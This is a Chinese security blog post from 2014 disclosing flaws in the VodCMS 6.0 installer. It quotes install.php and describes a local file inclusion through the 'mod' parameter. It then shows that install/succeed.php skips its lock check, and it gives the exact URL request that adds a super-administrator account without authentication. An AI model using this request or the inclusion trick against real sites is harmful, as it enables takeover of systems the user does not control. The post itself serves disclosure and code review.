Vodcms 6.0 Getshell

前几天90SEC群里有人说读读这套系统的代码
这几天正好在做这方面的视频,就顺手读了读

本地文件包含:
/install.php

@error_reporting(E_ALL ^ E_NOTICE);
@ini_set("display_errors",On);
@ini_set('memory_limit', '128M');
ini_set("register_globals", 0);
ini_set("magic_quotes_gpc" , 0);
set_magic_quotes_runtime(0);
define("ROOT",dirname(__FILE__).DIRECTORY_SEPARATOR);
set_include_path(ROOT.PATH_SEPARATOR.ROOT.'library'.PATH_SEPARATOR.
ROOT.'application/controllers'.PATH_SEPARATOR.
ROOT.'application/Models/'.PATH_SEPARATOR.get_include_path());
header("Content-Type:text/html;charset=gb2312");
$mod = trim($_GET['mod']) ? trim($_GET['mod']) : "setup_1"; // 首先这里接受了$mod变量
$GLOBALS['succeed'] = true;
switch($mod)
{
 
    case "setup_4":
 
        $error = false;
 
        $array = null;
 
        $array['dbhost'] = trim($_POST['dbhost']);
 
        $array['dbname'] = trim($_POST['dbname']);
 
        $array['dbuser'] = trim($_POST['dbuser']);
 
        $array['dbpass'] = trim($_POST['dbpass']);
 
        $array['tblpre'] = trim($_POST['tblpre']);
 
        if (! ($conn = @mysql_connect($array['dbhost'],$array['dbuser'], $array['dbpass'])))
 
        {
 
            $error = mysql_error();
 
        }else{
 
                 
 
            if (!mysql_query("CREATE DATABASE IF NOT EXISTS `".$array['dbname']."`"))
 
            {
 
                $error = "创建数据库失败!您可能没有权限!".mysql_error();
 
            }
 
 
            if ( !@mysql_select_db($array['dbname'], $conn))
 
            {
 
                $error.= mysql_error();
 
            }else{
 
                $filepath = ROOT.'config/database.inc.php';
 
                $text   =file_get_contents($filepath);
 
                foreach ($array as $key=>$value){
 
                    $text = preg_replace("/[$]database['$key'](s+)=(.+?);/$is",
 
                    "$database['$key']$1= '".$value."';",$text);
 
                }
 
                $fp = fopen($filepath, "w");
 
                if (fwrite($fp, $text)===false)
 
                {
 
                    $error = "写入配置文件".$filepath."失败";
 
                }
 
                unset($text);
 
                 
 
            }
 
        }
 
        if ($error)
 
        {
 
            $mod = "setup_3";
 
        }
 
        $result = @mysql_query("SHOW TABLES FROM ".$array['dbname']);
 
        while($rs = @mysql_fetch_array($result))
 
        {
 
            $tablearray[] = $rs[0];
 
        }
 
        if (is_array($tablearray)){
 
            if (array_search($array['tblpre']."admin", $tablearray)!==false)
 
            {
 
                $error = "<li><font color=red>系统已经被安装过秀影vodcms系统!继续安装会清空已有数据!</font></li>";
 
                $errorjs = "onclick="return confirm('系统已经安装过vodcms系统!继续会清空已有数据!确认继续吗?')"";
 
            }
 
        }
 
    break;
 
    case "setup_5":
 
        $error = null;
 
        $username = trim($_POST['username']);
 
        $password1 = md5(strtolower(trim($_POST['password1'])));
 
        $password2= md5(strtolower(trim($_POST['password2'])));
 
        if ($password1 != $password2)
 
        {
 
            $error = "两次密码输入不一致!";
 
        }
 
        if ($error)
 
        {
 
            $mod = "setup_4";
 
        }
 
    break;
// 在这个地方,直接给包含进来了 使用 %00可以说是你懂我懂大家懂了
case 'succeed':
        require_once("install/$mod.php");
        exit;
    break;

数据库覆盖安装:

case 'succeed':
require_once("install/$mod.php");
exit;

引起了我的注意

跟进install 文件看看
20140221013835

if (@file_exists(ROOT."cache/install.lock")==false){
    require (ROOT.'library/loader.php');
    require ROOT.'application/global.func.php';
    include ROOT."config/database.inc.php";
    include ROOT."config/license.php";
    Easy_Db::Connect($database);
    $DB = Easy_Db::getInstance();
    $array['username'] = trim(strtolower($_GET['username']));
    $array['password'] = trim(strtolower($_GET['password']));
    $array['group'] = '超级管理员';
    $IO = new Easy_Filesystem();
    $path = str_replace(strrchr($_SERVER['PHP_SELF'],"/"),"",$_SERVER['PHP_SELF'])."/";
    $text = $IO->getContent(ROOT."config/config.inc.php");
    $text = preg_replace("/$config['basedir'](s+)=(.+?);/is","$config['basedir']$1= "$path";",$text);
    $text = preg_replace("/$config['createuser'](s+)=(.+?);/is","$config['basedir']$1= "".$array['username']."";",$text);
     
    $IO->wfile(ROOT."config/config.inc.php", $text);
    unset($text);
    if ($array['username']){
        $sqlline = $IO->getContent(ROOT."install/vodcms.sql");
        if (empty($sqlline))
        {
            $sqlline = $IO->getContent("http://www.vodcms.com/install/vodcms.txt");
        }
        runquery($sqlline);
        $fp = @fopen(ROOT.'config/install.lock', 'w');
        @fwrite($fp, 'vodcms_install_6.0.3');
        @fclose($fp);
        @unlink(ROOT.'install.php');
        $DB->insert($database['tblpre'].'admin', $array);
        echo '建立管理员成功';
    }else{
        exit('请填写用户名以及登陆密码');
    }
}else{?>

有人觉得,这代码写的没错啊。很好很强大啊

好吧。其实我也觉得。

但是仔细看看他写的代码,if里。 ROOT 这个常量压根就没定义啊!
没定义就相当于直接报错了,但是他屏蔽了。好吧。这个if 的逻辑永远都等于“真”
所以说才会执行“真”的代码段。也就是

require (ROOT.'library/loader.php');
    require ROOT.'application/global.func.php';
    include ROOT."config/database.inc.php";
    include ROOT."config/license.php";
    Easy_Db::Connect($database);
    $DB = Easy_Db::getInstance();
    $array['username'] = trim(strtolower($_GET['username']));
    $array['password'] = trim(strtolower($_GET['password']));
    $array['group'] = '超级管理员';
    $IO = new Easy_Filesystem();
    $path = str_replace(strrchr($_SERVER['PHP_SELF'],"/"),"",$_SERVER['PHP_SELF'])."/";
    $text = $IO->getContent(ROOT."config/config.inc.php");
    $text = preg_replace("/$config['basedir'](s+)=(.+?);/is","$config['basedir']$1= "$path";",$text);
    $text = preg_replace("/$config['createuser'](s+)=(.+?);/is","$config['basedir']$1= "".$array['username']."";",$text);
     
    $IO->wfile(ROOT."config/config.inc.php", $text);
    unset($text);
    if ($array['username']){
        $sqlline = $IO->getContent(ROOT."install/vodcms.sql");
        if (empty($sqlline))
        {
            $sqlline = $IO->getContent("http://www.vodcms.com/install/vodcms.txt");
        }
        runquery($sqlline);
        $fp = @fopen(ROOT.'config/install.lock', 'w');
        @fwrite($fp, 'vodcms_install_6.0.3');
        @fclose($fp);
        @unlink(ROOT.'install.php');
        $DB->insert($database['tblpre'].'admin', $array);
        echo '建立管理员成功';
    }else{
        exit('请填写用户名以及登陆密码');
    }

然后succeed.php?username=08sec&password=08sec的MD5加密

然后就添加了一个管理员了。。

作者:y0umer

本文固定链接: https://www.unhonker.com/bug/1532.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2014年02月21日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Vodcms 6.0 Getshell | 90' s Blog|关注网络信息安全
关键字:

Vodcms 6.0 Getshell:目前有1 条留言

  1. 沙发
    Antergone:

    aaaa

    2014-03-03 00:07

发表评论

您必须 [ 登录 ] 才能发表留言!